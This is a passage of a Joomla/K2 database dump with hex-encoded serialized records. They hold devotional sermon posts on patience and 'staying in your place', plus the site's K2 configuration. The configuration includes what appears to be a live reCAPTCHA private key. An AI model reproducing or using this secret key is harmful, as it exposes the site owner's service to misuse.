69656e742077697468207573207765206d7573742062652070617469656e74207769746820476f6420616c736f2e3c2f703e0d0a3c703e54686520776f7264732070617469656e63652c206c6f6e67737566666572696e6720616e6420656e647572616e63652061726520747269706c657473206f66207468652073616d65206661746865722e20596f75206e656564206c6f6e67737566666572696e6720776974682070656f706c653b20796f75206e65656420656e647572616e6365207768656e20796f7520617265206465616c696e6720776974682074686520646576696c207768696c652070617469656e6365206973207768617420796f75206e656564207768656e20796f7520617265206465616c696e67207769746820476f642e20546865204269626c65207361797320796f752068617665206e656564206f662070617469656e636520616674657220796f75206861766520646f6e65207468652077696c6c206f6620476f642e204e6f74206265666f7265206275742061667465722c20736f207468617420796f752063616e206f627461696e20776861742048652070726f6d697365642e204861766520796f7520646f6e65207468652077696c6c206f6620476f643f205374616e6420616e64207374616e64207468657265666f72652120486176696e6720646f6e6520616c6c2c20746865204269626c652073617973207374616e64206e6f7720616e64207468617420e2809c7374616e64e2809d206d61792074616b6520796f752074656e2079656172732e20576861742069732074686520616c6c207468617420476f642069732061736b696e6720796f7520746f20646f3f20576861742069732074686520616c6c207468617420796f75206b6e6f772c207468617420697320726967687420616e642074686174206973207265717569726564206f6620796f7520746f20646f3f20486176696e6720646f6e6520616c6c2069732061626f757420646f696e672077686174206973206c65676974696d6174656c7920706f737369626c6520666f7220796f7520746f20646f2e20476f64206973206e657665722061736b696e6720796f7520746f20646f207768617420697320696d706f737369626c6520666f7220796f7520746f20646f212050617469656e63652069732077616974696e6720666f72207468652073616c766174696f6e206f6620746865204c6f72642e3c2f703e0d0a3c703e41732061206368696c64206f6620476f642c206b656570207573696e6720796f757220736d616c6c206461797320746f20646576656c6f70207374616d696e6120666f7220746865206c6f6e672064697374616e63652e20576861746576657220476f6420616c6c6f777320796f7520746f20646f2069732061206c6f6e672064697374616e636520726163652e20416674657220796f752072656365697665207468652063616c6c696e6720616e642073746172742c20796f75206d75737420736574746c6520646f776e20746f2061206c6f6e672064697374616e636520747269702e20496d6d61747572652070656f706c6520616c776179732077616e7420746f2061727269766520746f6f20736f6f6e206265636175736520746f207468656d207375636365737320697320612064657374696e6174696f6e2e20546f20746865206d61747572652c2073756363657373206973206e6f7420612064657374696e6174696f6e2062757420616e20756e666f6c64696e67206a6f75726e657920616e64206576656e207768656e20796f75207468696e6b20796f75206861766520676f7474656e20746f2074686520706c616365206f66206172726976616c2c20476f64206d616e792074696d6573207361797320796f7520617265206a757374207374617274696e672e20536f2062652070617469656e7420616e64206b65657020676976696e6720796f757220616c6c2c206b65657020736f77696e67207365656420616e64206b6565702070757474696e67206f757420796f757220626573742e204d617920796f7520686176652073756666696369656e742070617469656e636520696e2074686973204e6577205965617220746f207374657020696e746f20616c6c207468617420746865206661746865722068617320707265706172656420666f7220796f7520696e204a65737573e28099206e616d652e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031362d31322d33312032313a33383a3530223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2232223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31303a22373a70617469656e6365223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a32383a22636f6d706f6e656e742f6b322f6974656d2f372d70617469656e6365223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d37223b733a353a22726f757465223b733a34373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d373a70617469656e6365223b733a353a227469746c65223b733a32383a2250617469656e6365207769746820446976696e6520576f726b696e67223b733a31313a226465736372697074696f6e223b733a3436343a2220546865726520697320612070617469656e63652074686174207765206e656564207769746820476f642e20476f6420726571756972657320636f6e7374616e637920696e207768617420796f752061726520646f696e6720666f722048696d2e20496d70617469656e63652064697372757074732074686520776f726b206f6620476f6420696e20746865206c69766573206f66206869732070656f706c652e496d70617469656e63652063616e206361757365206120706572736f6e20746f206d616b652061766f696461626c65206d697374616b65732e20546865726520697320612070617469656e63652074686174207765206d75737420616c6c6f7720666f7220476f6420746f20646f20616c6c207468617420486520696e74656e647320746f20646f20696e2075732c207769746820757320616e64207468726f7567682075732e20596f752063616ee280997420777269746520616c6c2074686520626f6f6b73207468617420476f642068617320706c6163656420696e20796f75722073706972697420696e206f6e6520796561723b2074686174206973206e6f7420706f737369626c6520736f20796f75206e65656420746f2065786572636973652070617469656e63652e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031362d31322d33302030303a30303a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031362d31322d33302030303a30303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(253, 'index.php?option=com_k2&view=item&id=11', 'index.php?option=com_k2&view=item&id=11:you-made-it-congratulations', 'You made it CONGRATULATIONS!', ' However as we move into the new year, I want to encourage you STAY IN YOUR PLACE!. DETERMINE to stay in your place. There will be battles of replacement and displacement but you must stay in your place. Hold your ground don\'t give up or give in to the enemy. The bible says in the book of proverbs 27:8, \"like a bird that wanders out of it\'s nest so is a man who wanders out of his place\" there is a place called \'your place\', ', '2017-06-25 14:19:30', '6f85e901affe22bf9de7ec69f9b9941b', 1, 1, 1, '*', '2017-01-01 10:58:58', '0000-00-00 00:00:00', '2017-01-01 10:58:58', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223131223b733a353a22616c696173223b733a32373a22796f752d6d6164652d69742d636f6e67726174756c6174696f6e73223b733a373a2273756d6d617279223b733a3437333a223c703e486f7765766572206173207765206d6f766520696e746f20746865206e657720796561722c20492077616e7420746f20656e636f757261676520796f75205354415920494e20594f555220504c414345212e2044455445524d494e4520746f207374617920696e20796f757220706c6163652e20546865726520c2a020c2a077696c6c20c2a020c2a0626520c2a020626174746c657320c2a0206f6620c2a0207265706c6163656d656e7420c2a020c2a020616e6420646973706c6163656d656e7420c2a062757420796f75206d757374207374617920696e20796f757220706c6163652e20c2a020486f6c6420796f75722067726f756e6420646f6e27742067697665207570206f72206769766520696e20746f2074686520656e656d792e20546865206269626c65207361797320696e2074686520626f6f6b206f662070726f76657262732032373a382c20226c696b652061206269726420746861742077616e64657273206f7574206f662069742773206e65737420736f2069732061206d616e2077686f2077616e64657273206f7574206f662068697320706c6163652220746865726520c2a0697320c2a06120706c61636520c2a063616c6c65642027796f757220c2a0706c616365272c3c2f703e0d0a223b733a343a22626f6479223b733a323432303a220d0a3c703ec2a0646f6e277420616c6c6f7720c2a0796f757273656c6620746f206265206b69636b6564206f7574206f6620796f757220706c6163652e20c2a0476f6420686173206f726461696e656420c2a0796f7520746f2070726f7370657220c2a0616e6420666c6f757269736820c2a0696e20796f757220706c6163652c20646f6e277420676574206361727269656420c2a061776179207769746820746865207472656e642e205365656b206f757420796f7572206f776e20706c61636520616e6420737461792074686572652e204e6f206d61747465722074686520686172647368697020c2a06f72206368616c6c656e6765732c20796f7572206f776e20706c61636520697320746865206265737420706c61636520c2a0666f7220796f7520746f2067726f7720c2a07374726f6e6720c2a0616e642070726f737065722e20c2a020486f6c6420796f757220c2a067726f756e642c20c2a06c61626f722c20696e766573742c20c2a0776f726b2c20c2a0736f7720c2a0696e20c2a0796f757220c2a0706c61636520c2a020616e6420c2a073656520c2a0676c6f72696f7573207468696e67732068617070656e20c2a0666f7220796f7520616e6420746f20796f752e20c2a0497361616320c2a0736f77656420696e20746865206c616e642077686572652066616d696e652073747275636b20616e64206865207969656c64656420c2a0206861727665737420696e20612068756e6472656420666f6c64732c20c2a0626520696e737472756374656420c2a02062656c6f7665642e20c2a054686520626567696e6e696e67206f662076616761626f6e6461727920c2a06973206c656176696e6720796f757220706c6163652e3c2f703e0d0a3c703e596f757220706c61636520636f756c64206d65616e2061206c6f636174696f6e2c20697420636f756c642062652061207374617465206f662068656172742c20c2a06120636f6e646974696f6e20c2a06f66206d696e642c206120706f736974696f6e2c20c2a0796f757220c2a0726f6c6520c2a0696e206d696e69737472792c20796f75722061737369676e6d656e747320c2a06f72206576656e20796f757220706f73747572696e672c20776861746576657220c2a0697420c2a06d65616e7320c2a020746f20c2a0796f752c20c2a0444f4e2754204c4541564520594f555220504c4143452e204c756369666572206c6566742068697320c2a0706c6163652c204b696e67205361756c206c6566742068697320c2a0706c6163652c2056617368746920c2a06c65667420c2a068657220c2a0706c6163652c20c2a044656d61732c20c2a04a6f686e20c2a0204d61726b2c20c2a04a756461732c20c2a07468652070726f646967616c20c2a0736f6e2c20c2a041646f6e696a612c20c2a0416273616c6f